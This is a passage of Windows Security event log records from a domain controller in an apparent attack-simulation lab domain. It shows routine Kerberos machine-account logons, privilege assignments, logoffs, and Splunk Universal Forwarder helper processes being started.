The logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network).
The New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on.
The network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases.
The impersonation level field indicates the extent to which a process in the logon session can impersonate.
The authentication information fields provide detailed information about this specific logon request.
- Logon GUID is a unique identifier that can be used to correlate this event with a KDC event.
- Transited services indicate which intermediate services have participated in this logon request.
- Package name indicates which sub-protocol was used among the NTLM protocols.
- Key length indicates the length of the generated session key. This will be 0 if no session key was requested.
04/19/2021 02:55:55 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4672
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Special Logon
OpCode=Info
RecordNumber=264205
Keywords=Audit Success
Message=Special privileges assigned to new logon.
Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x7D0708
Privileges: SeSecurityPrivilege
SeBackupPrivilege
SeRestorePrivilege
SeTakeOwnershipPrivilege
SeDebugPrivilege
SeSystemEnvironmentPrivilege
SeLoadDriverPrivilege
SeImpersonatePrivilege
SeDelegateSessionUserImpersonatePrivilege
SeEnableDelegationPrivilege
04/19/2021 02:56:08 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=264209
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x1808
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe"
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 02:56:08 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=264208
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x1b64
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe"
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 02:56:09 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=264210
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x1bd4
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe"
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 02:56:10 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=264211
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0xc94
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe"
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 02:56:13 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=264212
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0xf70
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" --ps2
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 02:56:14 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=264214
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x13b0
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe"
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 02:56:14 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=264213
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x56c
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe"
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 02:56:55 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4634
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Logoff
OpCode=Info
RecordNumber=264217
Keywords=Audit Success
Message=An account was logged off.
Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x7D404C
Logon Type: 3
This event is generated when a logon session is destroyed. It may be positively correlated with a logon event using the Logon ID value. Logon IDs are only unique between reboots on the same computer.
04/19/2021 02:56:55 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4624
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Logon
OpCode=Info
RecordNumber=264216
Keywords=Audit Success
Message=An account was successfully logged on.
Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Logon Information:
Logon Type: 3
Restricted Admin Mode: -
Virtual Account: No
Elevated Token: Yes
Impersonation Level: Impersonation
New Logon:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE.LOCAL
Logon ID: 0x7D404C
Linked Logon ID: 0x0
Network Account Name: -
Network Account Domain: -
Logon GUID: {D86F149B-DAEC-EE97-650F-2B5A9BD5B8D7}
Process Information:
Process ID: 0x0
Process Name: -
Network Information:
Workstation Name: -
Source Network Address: ::1
Source Port: 62415
Detailed Authentication Information:
Logon Process: Kerberos
Authentication Package: Kerberos
Transited Services: -
Package Name (NTLM only): -
Key Length: 0
This event is generated when a logon session is created. It is generated on the computer that was accessed.
The subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe.
The logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network).
The New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on.
The network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases.
The impersonation level field indicates the extent to which a process in the logon session can impersonate.
The authentication information fields provide detailed information about this specific logon request.
- Logon GUID is a unique identifier that can be used to correlate this event with a KDC event.
- Transited services indicate which intermediate services have participated in this logon request.
- Package name indicates which sub-protocol was used among the NTLM protocols.
- Key length indicates the length of the generated session key. This will be 0 if no session key was requested.
04/19/2021 02:56:55 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4672
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Special Logon
OpCode=Info
RecordNumber=264215
Keywords=Audit Success
Message=Special privileges assigned to new logon.
Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x7D404C
Privileges: SeSecurityPrivilege
SeBackupPrivilege
SeRestorePrivilege
SeTakeOwnershipPrivilege
SeDebugPrivilege
SeSystemEnvironmentPrivilege
SeLoadDriverPrivilege
SeImpersonatePrivilege
SeDelegateSessionUserImpersonatePrivilege
SeEnableDelegationPrivilege
04/19/2021 02:57:08 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=264219
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x16e0
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe"
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 02:57:08 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=264218
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x1268
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe"
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 02:57:09 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=264220
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x1774
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe"
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 02:57:10 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=264221
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x1034
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe"
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 02:57:13 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=264222
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x1914
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" --ps2
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 02:57:14 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=264224
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x53c
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe"
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 02:57:14 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=264223
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0xaa0
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe"
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 02:57:19 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4634
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Logoff
OpCode=Info
RecordNumber=264227
Keywords=Audit Success
Message=An account was logged off.
Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x7D6FFA
Logon Type: 3
This event is generated when a logon session is destroyed. It may be positively correlated with a logon event using the Logon ID value. Logon IDs are only unique between reboots on the same computer.
04/19/2021 02:57:19 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4624
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Logon
OpCode=Info
RecordNumber=264226
Keywords=Audit Success
Message=An account was successfully logged on.
Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Logon Information:
Logon Type: 3
Restricted Admin Mode: -
Virtual Account: No
Elevated Token: Yes
Impersonation Level: Impersonation
New Logon:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE.LOCAL
Logon ID: 0x7D6FFA
Linked Logon ID: 0x0
Network Account Name: -
Network Account Domain: -
Logon GUID: {D86F149B-DAEC-EE97-650F-2B5A9BD5B8D7}
Process Information:
Process ID: 0x0
Process Name: -
Network Information:
Workstation Name: -
Source Network Address: fe80::4c41:d752:3570:2ca6
Source Port: 62421
Detailed Authentication Information:
Logon Process: Kerberos
Authentication Package: Kerberos
Transited Services: -
Package Name (NTLM only): -
Key Length: 0
This event is generated when a logon session is created. It is generated on the computer that was accessed.
The subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe.
The logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network).
The New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on.
The network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases.
The impersonation level field indicates the extent to which a process in the logon session can impersonate.
The authentication information fields provide detailed information about this specific logon request.
- Logon GUID is a unique identifier that can be used to correlate this event with a KDC event.
- Transited services indicate which intermediate services have participated in this logon request.
- Package name indicates which sub-protocol was used among the NTLM protocols.
- Key length indicates the length of the generated session key. This will be 0 if no session key was requested.
04/19/2021 02:57:19 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4672
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Special Logon
OpCode=Info
RecordNumber=264225
Keywords=Audit Success
Message=Special privileges assigned to new logon.
Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x7D6FFA
Privileges: SeSecurityPrivilege
SeBackupPrivilege
SeRestorePrivilege
SeTakeOwnershipPrivilege
SeDebugPrivilege
SeSystemEnvironmentPrivilege
SeLoadDriverPrivilege
SeImpersonatePrivilege
SeDelegateSessionUserImpersonatePrivilege
SeEnableDelegationPrivilege
04/19/2021 02:57:20 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4634
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Logoff
OpCode=Info
RecordNumber=264230
Keywords=Audit Success
Message=An account was logged off.
Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x7D7066
Logon Type: 3
This event is generated when a logon session is destroyed. It may be positively correlated with a logon event using the Logon ID value. Logon IDs are only unique between reboots on the same computer.
04/19/2021 02:57:20 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4624
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Logon
OpCode=Info
RecordNumber=264229
Keywords=Audit Success
Message=An account was successfully logged on.
Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Logon Information:
Logon Type: 3
Restricted Admin Mode: -
Virtual Account: No
Elevated Token: Yes
Impersonation Level: Impersonation
New Logon:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE.LOCAL
Logon ID: 0x7D7066
Linked Logon ID: 0x0
Network Account Name: -
Network Account Domain: -
Logon GUID: {D86F149B-DAEC-EE97-650F-2B5A9BD5B8D7}
Process Information:
Process ID: 0x0
Process Name: -
Network Information:
Workstation Name: -
Source Network Address: fe80::4c41:d752:3570:2ca6
Source Port: 62422
Detailed Authentication Information:
Logon Process: Kerberos
Authentication Package: Kerberos
Transited Services: -
Package Name (NTLM only): -
Key Length: 0
This event is generated when a logon session is created. It is generated on the computer that was accessed.
The subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe.
The logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network).
The New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on.
The network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases.
